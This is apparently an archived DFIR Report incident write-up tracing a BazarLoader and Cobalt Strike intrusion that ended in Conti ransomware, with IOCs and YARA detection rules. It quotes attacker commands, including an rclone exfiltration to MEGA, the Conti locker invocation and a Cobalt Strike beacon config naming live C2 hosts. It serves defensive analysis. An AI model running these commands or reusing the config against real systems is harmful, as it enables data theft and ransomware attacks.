{
	"id": "1ac05cc8-7eae-4110-b9f8-8c8762d99095",
	"created_at": "2026-04-06T00:06:59.424502Z",
	"updated_at": "2026-04-10T03:37:23.907431Z",
	"deleted_at": null,
	"sha1_hash": "64e1e4cdab99fefe919b03ea76f82364cd9d41b1",
	"title": "CONTInuing the Bazar Ransomware Story",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1658822,
	"plain_text": "CONTInuing the Bazar Ransomware Story\r\nBy editor\r\nPublished: 2021-11-29 · Archived: 2026-04-05 15:26:04 UTC\r\nIn this report we will discuss a case from early August where we witnessed threat actors utilizing BazarLoader and Cobalt\r\nStrike to accomplish their mission of encrypting systems with Conti ransomware.\r\nThe normal list of discovery tools were used during this case such as AdFind, Net, Ping, PowerView, and Nltest. Rclone was\r\nused to exfiltrate company data to Mega and Process Hacker was used to dump LSASS. The threat actors executed a Conti\r\nbatch file on a server which then encrypted most of the domain joined systems.\r\nCase Summary\r\nIn August, we witnessed an intrusion that started from a BazarLoader infection.  A Phishing campaign distributing\r\npassword-protected zip files with weaponized documents to victims was the likely delivery source. Macros inside the word\r\ndocument extracted and executed a malicious .HTA document, which downloaded and loaded the BazarLoader DLL in\r\nmemory.\r\nIt is now apparent to the information security community that intrusions starting with BazarLoader frequently end with\r\nConti ransomware. This case saw such a conclusion. There are some evident similarities in cases that involve Conti\r\nransomware. Ransomware operators’ tooling and overall tasks performed tend to match across the cluster. When we look at\r\nour earlier Conti case, this becomes noticeable. This could be due to the widely circulated Conti manual that was leaked by\r\nan affiliate. In this case, we saw the same pattern of events with tools like net, nltest, ShareFinder for discovery, Cobalt\r\nStrike for C2, and WMIC remote process creation for expanding their access within the network.\r\nEven though the intrusion lasted for five days total, Cobalt Strike and hands-on keyboard operators showed up in the first\r\ntwo hours of the intrusion. 
Straight away, they started gathering information to get the lay of the land using Net commands. Then they continued looking for open shares by executing the PowerView module Invoke-ShareFinder.\r\nAfter collecting and dissecting the results from ShareFinder, they appeared to have a good understanding of the server and workstation layout of the organization, as they started executing commands to gather information from specific, high-value servers. During that time, we saw errors where operators failed to alter specific parameters, which indicates that the operator was acting from a pre-defined playbook. They eventually decided to pivot laterally to a server using WMIC to execute a Cobalt Strike beacon DLL.\r\nOnce they had access to the remote server via the Cobalt Strike beacon, they re-ran Invoke-ShareFinder and then exfiltrated data of interest from a different server using the Rclone application to the MEGA cloud storage service.\r\nOn the second day, the threat actors used RDP to access the backup server and, in doing so, reviewed the backup settings and the running processes on the server via the Task Manager GUI.\r\nOn day four, the threat actors returned and ran another round of exfiltration using Rclone and MEGA again.\r\nOn the fifth day, they moved fast towards their final objective, which was Conti ransomware. Before executing Conti, they used RDP to install and configure the AnyDesk remote desktop application. Having GUI access, they attempted to use ProcessHacker to dump the LSASS process. 
After this last step, they deployed Conti ransomware via a batch script to all domain-joined systems.\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 1 of 27\n\nOne interesting fact about this case is that the threat actors were not seen interacting with the Domain Controllers (DCs). Most ransomware cases we see involve the threat actor executing code on the DCs.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, PoshC2, BazarLoader, etc. More information on this service and others can be found here.\r\nThe Cobalt Strike servers in this case were added to the Threat Feed on 5/20/21 and 08/03/21.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nAnalysis and reporting completed by @Kostastsale, @pigerlin, and @_pete_0\r\nReviewed by @TheDFIRReport\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThanks to @James_inthe_box for the sample!\r\nAs with previously documented intrusions, a weaponized Microsoft Word document is used to lure the user into enabling a macro to execute the payload. 
The user is presented with the following:\r\nReviewing the file, we can observe that although it is labeled as a .doc file, the file type appears as XML when reviewing the file attributes.\r\nA deeper inspection shows the Word 2003 XML formatting and the contained macro.\r\nOnce the macro has been enabled, in the next stage, an HTML Application (HTA) file is created and dropped into the user’s folder:\r\nFollowed by the execution of the HTA:\r\nAnalysis of the HTA file shows a mix of encoded HTML and JavaScript/VBScript code, not to mention profanity at the start of the file.\r\nThe base64 encoded string can be decoded to:\r\nThe code downloads a binary file (compareForfor.jpg) masquerading as a JPG (image file) from millscruelg[.]com to the folder “c:\\users\\public” and, using the incorporated VBScript code, utilizes REGSVR32 to execute this DLL.\r\nThis initiates a connection to 64.227.65[.]60:443 and invokes a Svchost.exe, followed by a lookup to myexternalip[.]com to retrieve the external public-facing IPv4 address of the network. The attacker could use this information to verify the network being targeted and/or to facilitate tool configuration. Two DLLs were loaded via RunDll32 using the Svchost process. The first was D574.dll:\r\nFollowed by D8B3.dll:\r\nD8B3.dll injected into the Winlogon process (high integrity):\r\nIn the case of D8B3.dll, the DLL was Go compiled. 
Both DLLs had invalid certificates and could be detected by checking for any failed/revoked status:\r\nAdditionally, each DLL had no populated metadata relating to the DLL:\r\nThe process hierarchy tree visualization below:\r\nThis is very similar to the Bazarloader analysis by Brad Duncan on 11/08/2021.\r\nPersistence\r\nWe observed the AnyDesk application created under the folder c:\\users\\\u003cREDACTED\u003e\\Videos, an unusual and suspicious location for process activity. This is a good detection opportunity: portable executables appearing in non-standard file system locations.\r\nAnyDesk is a closed source remote desktop application that is available for several operating systems. It is free for private use. We observed a long connection initiated from the AnyDesk application towards legitimately registered IPv4 ranges. However, we did not observe many events of interest during these sessions.\r\nCredential Access\r\nProcessHacker was also dropped in the root of C:\\ and likely used to access the LSASS process. The use of utilities such as ProcessHacker would be unusual for typical users, and applications running from the C:\\ root would also be suspicious in certain environments.\r\nDiscovery\r\nUsing the RunDLL32 and Winlogon processes, we observed many typical host and network discovery commands utilizing living off the land techniques such as net, nltest, tasklist and time. 
Examples included:\r\ntasklist /s \u003cREDACTED\u003e\r\nnet group \"domain admins\" /dom\r\nnet localgroup \"administrator\"\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all time\r\nping\r\nWhile running some of these commands, copy-paste errors were present, indicating that the operator was likely working from a runbook such as the leaked Conti manual from August. This can be seen in tasklist /s ip being run with ip rather than the actual host system's IP, and in the command seen right after this mistake.\r\nThe cmd.exe process invoked many of the commands with unusual parent processes such as RunDLL32.exe. The example below uses the time command:\r\nRed Canary provides a good detection guide for RunDLL32; this covers unusual RunDLL32 activity such as command-less execution, unusual spawned activity, etc.\r\nDiscovery command invocation:\r\nAdFind was observed via a file write for the binary, but there was no evidence of execution.\r\nFile share enumeration was achieved using the PowerShell Invoke-ShareFinder script, part of PowerView. The output file was created at c:\\ProgramData\\found_shares.txt. The use of this tool has been observed in other recent intrusions. 
PowerShell was invoked by the WinLogon process and the resulting file was created by Rundll32.exe.\r\nOn the second day of the intrusion, the threat actors accessed the backup server via RDP through the Cobalt Strike beacon and opened the backup console on that server.\r\nAfter reviewing the backups, they also opened Task Manager via the GUI (indicated by the /4 in the process command line) to review the running processes on the system.\r\nLateral Movement\r\nA Cobalt Strike beacon was executed on a critical asset (the backup host in this intrusion) within the network using the following command:\r\nRemote process execution was achieved using WMI invoking Rundll32 to load 143.dll (the Cobalt Strike beacon) on the target host:\r\nThe Cobalt Strike beacon (143.dll) injected into the svchost process ‘svchost.exe -k UnistackSvcGroup -s CDPUserSvc’:\r\nFollowed by a request to checkauj[.]com (82.117.252.143). Approximately 9 hours later, the attacker established an RDP session via the 143.dll. 
This was achieved very early in the intrusion, and we were able to correlate the activity:\r\nDuring this event, we believe that the attacker disclosed the remote workstation name ‘win-344vu98d3ru’.\r\nCommand and Control\r\nThe Bazar DLL masquerading as a jpg made use of HTTPS C2 throughout the full length of the intrusion.\r\nBazar C2\r\n64.227.65.60:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [7f:d6:df:4d:5e:c4:d9:71:c0:46:8d:47:e5:81:75:57:d6:92:72:96]\r\nNot Before: 2021/08/03 07:37:28 UTC\r\nNot After: 2022/08/03 07:37:28 UTC\r\nIssuer Org: GG EST\r\nSubject Common: perdefue.fr\r\nSubject Org: GG EST\r\nPublic Algorithm: rsaEncryption\r\n161.35.147.110:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [21:ff:9f:e0:8a:dd:c3:ed:36:90:a0:e1:11:70:fe:c4:b3:42:f5:1a]\r\nNot Before: 2021/08/03 07:37:30 UTC\r\nNot After: 2022/08/03 07:37:30 UTC\r\nIssuer Org: GG EST\r\nSubject Common: perdefue.fr\r\nSubject Org: GG EST\r\nPublic Algorithm: rsaEncryption\r\n161.35.155.92:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [42:7d:a4:48:5b:6b:2b:92:2c:07:9d:cc:59:14:2e:de:b1:e8:f5:bb]\r\nNot Before: 2021/08/03 07:37:30 UTC\r\nNot After: 2022/08/03 07:37:30 UTC\r\nIssuer Org: GG EST\r\nSubject Common: perdefue.fr\r\nSubject Org: GG EST\r\nPublic Algorithm: rsaEncryption\r\n64.227.69.92:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: ec74a5c51106f0419184d0dd08fb05bc\r\nCertificate: [97:33:eb:80:85:ae:f0:0e:40:94:ac:d5:38:96:6a:e5:75:2b:49:8c]\r\nNot Before: 2021/08/03 07:37:28 UTC\r\nNot After: 2022/08/03 07:37:28 UTC\r\nIssuer Org: GG EST\r\nSubject Common: perdefue.fr\r\nSubject Org: GG EST\r\nPublic Algorithm: 
rsaEncryption\r\nCobalt Strike\r\nThe first DLL [D574.dll] didn’t produce any immediate follow-on activity, whereas D8B3.dll was loaded by RunDll32 and associated with many activities, from file creation and process execution to persistent network connectivity to 82.117.252[.]143:443 throughout the intrusion.\r\nD574.dll was loaded by the RunDll32 process with persistent DNS query activity to volga.azureedge[.]net, but no established network connectivity.\r\nWe observed that the DLL payload “D574.dll” had issues contacting the domain volga.azureedge[.]net and the C2 server, seen via DNS 9003 response codes.\r\nExternal sandboxes show the domain tied to other Cobalt Strike beacon samples not associated with this report; it is likely the server had been taken down by this time.\r\nhttps://tria.ge/210803-w15fxk72ns\r\nhttps://capesandbox.com/analysis/175977/\r\nD8B3.dll illustrates initial activity, followed by established network connectivity to 82.117.252[.]143:80.\r\nD8B3.dll was the Cobalt Strike beacon the attackers used throughout the intrusion. It was the main payload to facilitate the bulk of the initial intrusion and the ongoing activities to maintain access. The DLL 143.dll used in lateral movement from the beachhead host to the backup server also communicated with this Cobalt Strike server. 
Once the attackers gained a foothold and pivoted laterally, they were able to switch to using RDP and access specific hosts of interest.\r\nfive.azureedge.net 82.117.252.143:80\r\ncheckauj.com 82.117.252.143:443\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [68:c5:fc:c0:4a:34:e4:8f:01:86:59:c1:da:40:78:00:00:20:a0:b0]\r\nNot Before: 2021/08/03 11:50:47 UTC\r\nNot After: 2021/11/01 11:50:45 UTC\r\nIssuer Org: Let's Encrypt\r\nSubject Common: checkauj.com [checkauj.com, www.checkauj.com]\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike Config\r\n82.117.252.143 – checkauj.com\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 60000,\r\n \"MaxGetSize\": 1403644,\r\n \"Jitter\": 37,\r\n \"C2Server\": \"checkauj.com,/jquery-3.3.1.min.js\",\r\n \"HttpPostUri\": \"/jquery-3.3.2.min.js\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 1522 bytes from the end\",\r\n \"Remove 84 bytes from the beginning\",\r\n \"Remove 3931 bytes from the beginning\",\r\n \"Base64 URL-safe decode\",\r\n \"XOR mask w/ random key\"\r\n ],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 0,\r\n \"bStageCleanup\": \"True\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"bProcInject_UseRWX\": \"False\",\r\n \"bProcInject_MinAllocSize\": 17500,\r\n \"ProcInject_PrependAppend_x86\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_PrependAppend_x64\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_Execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"\"}\r\nExfiltration\r\nOnce the attackers established access to critical assets, they used RClone to exfiltrate sensitive data to the MEGA cloud storage service. The full command used by Rclone includes a variety of parameters, including setting the bandwidth limit.\r\nrclone.exe copy --max-age 2y \"\\\\SERVER\\Shares\" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --\r\nRClone continues to be an effective tool for bulk data exfiltration. NCC Group has provided a detailed write-up of the Rclone application and detection methods.\r\nThe Rclone activity was observed on two separate occasions, each lasting around three hours and occurring between 1900 and 2200 UTC.\r\nImpact\r\nOn the fifth day, the threat actors moved to their final actions to encrypt the domain. They first pinged systems across the network via an interactive command shell. 
Iobit Unlocker was also dropped during this phase, but we did not see it used.\r\nAfter pinging systems, the threat actors opened a batch file that was ultimately used to launch the Conti ransomware.\r\nThe locker.bat is a bespoke script designed to encrypt files across a number of hosts:\r\nBased on the contents of the file, we can assess that the actors were likely making last-minute adjustments based on the ping results before executing the ransomware.\r\nThe ransomware was then launched via the backup server.\r\nTo encrypt systems, the ransomware mounted the C$ share of each target host and then performed its encryption routine.\r\nC:\\o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe -m -net -size 10 -nomutex -p \\\\\r\nHere’s an overview of the execution:\r\nAnalysis of the DLLs accompanying the EXE indicates Conti artifacts:\r\nOnce the encryption was completed, the following ransom note was dropped in all affected directories as ‘readme.txt’.\r\nThe content of these text files:\r\nFollowing the execution of the locker ransomware, the attacker then conducted a file listing discovery against multiple hosts, likely to validate and assess that the locker encryption was successful:\r\nIOCs\r\nNetwork\r\nBazarLoader\r\n64.227.69.92|443\r\n161.35.155.92|443\r\n161.35.147.110|443\r\n64.227.65.60|443\r\nLoader download\r\nmillscruelg.com\r\n45.95.11.133|80\r\nCobalt 
Strike\r\nvolga.azureedge.net\r\nfive.azureedge.net\r\ncheckauj.com\r\n82.117.252.143|443\r\n82.117.252.143|80\r\nFiles\r\nSuricata\r\nET TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile Response\r\nETPRO TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile M2\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nET POLICY HTTP POST to MEGA Userstorage\r\nSigma\r\nrclone_execution.yaml\r\nsysmon_in_memory_powershell.yml\r\nwin_susp_wmic_proc_create_rundll32.yml\r\nsysmon_abusing_debug_privilege.yml\r\nwin_trust_discovery.yml\r\nwin_office_shell.yml\r\nwin_mshta_spawn_shell.yml\r\nwin_susp_net_execution.yml\r\nwin_susp_regsvr32_anomalies.yml\r\nsysmon_rundll32_net_connections.yml\r\nwin_net_enum.yml\r\nwin_susp_wmi_execution.yml\r\nYara\r\n/*\r\n YARA Rule Set\r\n Author: TheDFIRReport\r\n Date: 2021-11-29\r\n Identifier: 5794\r\n */\r\n/* Rule Set ----------------------------------------------------------------- */\r\nrule mal_host2_143 {\r\n meta:\r\n description = \"mal - file 143.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610\"\r\n strings:\r\n $x1 = \"object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base\r\n $x2 = \"slice bounds out of range [:%x] with 
length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds no\r\n $x3 = \" to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurren\r\n $x4 = \"Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryr\r\n $x5 = \"GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFilea\r\n $x6 = \"lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not r\r\n $x7 = \"unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status\r\n $x8 = \"file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not\r\n $x9 = \".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign re\r\n $x10 = \"Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad\r\n $x11 = \"entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.push\r\n $x12 = \"ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks\r\n $s13 = \"y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typ\r\n $s14 = \"ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at\r\n $s15 = \".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend trac\r\n $s16 = \"ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS s\r\n $s17 = \"mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile al\r\n $s18 = \"structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not 
enable \\\"GetQueue\r\n $s19 = \"garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m-\u003elocke\r\n $s20 = \"tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 4000KB and\r\n 1 of ($x*) and all of them\r\n}\r\nrule mal_host1_D8B3 {\r\n meta:\r\n description = \"mal - file D8B3.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6\"\r\n strings:\r\n $x1 = \"object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base\r\n $x2 = \"slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds no\r\n $x3 = \" to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurren\r\n $x4 = \"Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryr\r\n $x5 = \"GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFilea\r\n $x6 = \"lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not r\r\n $x7 = \"unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status\r\n $x8 = \"file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not\r\n $x9 = \".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign re\r\n $x10 = \"Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad\r\n $x11 = \"entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.push\r\n $x12 = \"ollectionidentifier removedindex out of 
rangeinput/output errormultihop attemptedno child processesno locks\r\n $s13 = \"y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typ\r\n $s14 = \"ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at\r\n $s15 = \".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend trac\r\n $s16 = \"ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS s\r\n $s17 = \"mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile al\r\n $s18 = \"structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \\\"GetQueue\r\n $s19 = \"garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m-\u003elocke\r\n $s20 = \"tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 4000KB and\r\n 1 of ($x*) and all of them\r\n}\r\nrule mal_host2_AnyDesk {\r\n meta:\r\n description = \"mal - file AnyDesk.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7\"\r\n strings:\r\n $x1 = \"\u003cassemblyIdentity type=\\\"win32\\\" name=\\\"Microsoft.Windows.Common-Controls\\\" version=\\\"6.0.0.0\\\" processorArch\r\n $x2 = \"C:\\\\Buildbot\\\\ad-windows-32\\\\build\\\\release\\\\app-32\\\\win_loader\\\\AnyDesk.pdb\" fullword ascii\r\n $s3 = \"\u003cassemblyIdentity type=\\\"win32\\\" name=\\\"Microsoft.Windows.Common-Controls\\\" version=\\\"6.0.0.0\\\" processorArch\r\n $s4 = \"\u003cassemblyIdentity version=\\\"6.3.2.0\\\" processorArchitecture=\\\"x86\\\" 
name=\\\"AnyDesk.AnyDesk.AnyDesk\\\" type=\\\"w\r\n $s5 = \"4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O\" fullword ascii\r\n $s6 = \"(Symantec SHA256 TimeStamping Signer - G3\" fullword ascii\r\n $s7 = \"(Symantec SHA256 TimeStamping Signer - G30\" fullword ascii\r\n $s8 = \"http://ocsp.digicert.com0N\" fullword ascii\r\n $s9 = \"http://www.digicert.com/CPS0\" fullword ascii\r\n $s10 = \"Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0\" fullword ascii\r\n $s11 = \"\u003cdescription\u003eAnyDesk screen sharing and remote control software.\u003c/description\u003e\" fullword ascii\r\n $s12 = \"/http://crl3.digicert.com/sha2-assured-cs-g1.crl05\" fullword ascii\r\n $s13 = \"/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L\" fullword ascii\r\n $s14 = \"%jgmRhZl%\" fullword ascii\r\n $s15 = \"5ZW:\\\"Wfh\" fullword ascii\r\n $s16 = \"5HRe:\\\\\" fullword ascii\r\n $s17 = \"ysN.JTf\" fullword ascii\r\n $s18 = \"Z72.irZ\" fullword ascii\r\n $s19 = \"Ve:\\\\-Sj7\" fullword ascii\r\n $s20 = \"ekX.cFm\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 11000KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule ProcessHacker {\r\n meta:\r\n description = \"mal - file ProcessHacker.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f\"\r\n strings:\r\n $x1 = \"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\taskmgr.exe\" fullword wide\r\n $x2 = \"D:\\\\Projects\\\\processhacker2\\\\bin\\\\Release32\\\\ProcessHacker.pdb\" fullword ascii\r\n $x3 = \"ProcessHacker.exe\" fullword wide\r\n $x4 = \"kprocesshacker.sys\" fullword wide\n $x5 = \"ntdll.dll!NtDelayExecution\" fullword wide\n $x6 = \"ntdll.dll!ZwDelayExecution\" fullword wide\n $s7 = \"PhInjectDllProcess\" fullword ascii\n $s8 = 
\"_PhUiInjectDllProcess@8\" fullword ascii\n $s9 = \"logonui.exe\" fullword wide\n $s10 = \"Executable files (*.exe;*.dll;*.ocx;*.sys;*.scr;*.cpl)\" fullword wide\n $s11 = \"\\\\x86\\\\ProcessHacker.exe\" fullword wide\n $s12 = \"user32.dll!NtUserGetMessage\" fullword wide\n $s13 = \"ntdll.dll!NtWaitForKeyedEvent\" fullword wide\n $s14 = \"ntdll.dll!ZwWaitForKeyedEvent\" fullword wide\n $s15 = \"ntdll.dll!NtReleaseKeyedEvent\" fullword wide\n $s16 = \"ntdll.dll!ZwReleaseKeyedEvent\" fullword wide\n $s17 = \"\\\\kprocesshacker.sys\" fullword wide\n $s18 = \"\\\\SystemRoot\\\\system32\\\\drivers\\\\ntfs.sys\" fullword wide\n $s19 = \"_PhExecuteRunAsCommand2@36\" fullword ascii\n $s20 = \"_PhShellExecuteUserString@20\" fullword ascii\n condition:\n uint16(0) == 0x5a4d and filesize \u003c 4000KB and\n 1 of ($x*) and 4 of them\n}\nrule unlocker {\n meta:\n description = \"mal - file unlocker.exe\"\n author = \"TheDFIRReport\"\n date = \"2021-11-29\"\n hash1 = \"09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53\"\n strings:\n $s1 = \"For more detailed information, please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline\" fu\n $s2 = \"(Symantec SHA256 TimeStamping Signer - G20\" fullword ascii\n $s3 = \" \" fullword ascii\n $s4 = \"(Symantec SHA256 TimeStamping Signer - G2\" fullword ascii\n $s5 = \"Causes Setup to create a log file in the user's TEMP directory.\" fullword wide\n $s6 = \"Prevents the user from cancelling during the installation process.\" fullword wide\n $s7 = \"Same as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\" fullword wide\n $s8 = \" true\" fullword a\n $s9 = \"The Setup program accepts optional command line parameters.\" fullword wide\n $s10 = \"Instructs Setup to load the settings from the specified file after having checked the command line.\" fullwor\n $s11 = \"Overrides the default component settings.\" fullword wide\n $s12 = \"/MERGETASKS=\\\"comma separated list of 
task names\\\"\" fullword wide\n $s13 = \"/PASSWORD=password\" fullword wide\n $s14 = \"Specifies the password to use.\" fullword wide\n $s15 = \"yyyyvvvvvvvvvxxw\" fullword ascii\n $s16 = \"yyyyyyrrrsy\" fullword ascii\n $s17 = \" processorArchitecture=\\\"x86\\\"\" fullword ascii\n $s18 = \" processorArchitecture=\\\"x86\\\"\" fullword ascii\n $s19 = \"Prevents Setup from restarting the system following a successful installation, or after a Preparing to Insta\n $s20 = \"/DIR=\\\"x:\\\\dirname\\\"\" fullword wide\n condition:\n uint16(0) == 0x5a4d and filesize \u003c 7000KB and\n 8 of them\n}\r\nrule mal_host2_locker {\r\n meta:\r\n description = \"mal - file locker.bat\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3\"\r\n strings:\r\n $x1 = \"_locker.exe -m -net -size 10 -nomutex -p\" ascii\r\n condition:\r\n uint16(0) == 0x7473 and filesize \u003c 8KB and\r\n $x1\r\n}\r\nimport \"pe\"\r\nrule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker {\r\n meta:\r\n description = \"conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-29\"\r\n hash1 = \"9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219\"\r\n strings:\r\n $s1 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s2 = \"operator co_await\" fullword ascii\r\n $s3 = \"\u003e*\u003e6\u003eA\u003e_\u003e\" fullword ascii /* hex encoded string 'j' */\r\n $s4 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n $s5 = \"Bapi-ms-win-core-fibers-l1-1-1\" fullword wide\r\n $s6 = \"SVWjEhQ\" fullword ascii\r\n $s7 = \";F;[;l;\" fullword ascii /* Goodware String - occured 1 times */\r\n $s8 = \"74787@7H7P7T7\\\\7p7\" fullword ascii /* Goodware String - 
